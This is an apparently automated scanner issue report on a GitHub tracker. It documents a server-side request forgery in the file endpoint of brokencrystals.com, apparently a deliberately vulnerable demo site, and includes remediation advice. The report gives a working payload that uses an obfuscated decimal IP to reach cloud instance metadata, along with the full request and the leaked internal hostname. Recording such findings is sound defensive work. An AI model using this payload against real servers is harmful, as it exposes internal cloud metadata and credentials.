Skip to content

Server Side Request Forgery #13

Description

@bright-security

Server Side Request Forgery

Severity: High Discovered: 10 of October-2022, 11:12 PM

CWE ID

CWE-918

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Details

A Server Side Request Forgery (also known as SSRF) attack allows an attacker to read or update internal server resources.
SSRF occurred while injecting token "http://2852039166/latest/meta-data/local-hostname" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg
SSRF retrieved AWS metadata from internal resource "/latest/meta-data/local-hostname".

Possible exposure

Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data

Remediation suggestions

Whitelist DNS names or IP addresses that the application needs to access. Validate all user input. Never send raw server response body from the server to the client, always make sure to parse the respone first. Disable any unused schema i.e. ftp://, dict://, file:///, gopher://. Use authentication on all internal services.

Request

GET https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443550676; connect.sid=WakDBCc1ZpjPV8GmUMZUSPjeFIchbnbk.yi%2BPDU5Oh9XifqV%2FMuNOyzT9nH8MrfnqvB%2F%2B9BIO4f0
Accept-Encoding: identity
Metadata: true
Metadata-Flavor: Google
Accept: text/html

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:30 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443550891
Content-Length: 26
Cache-Control: public, max-age=99999

ip-10-0-0-200.ec2.internal

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions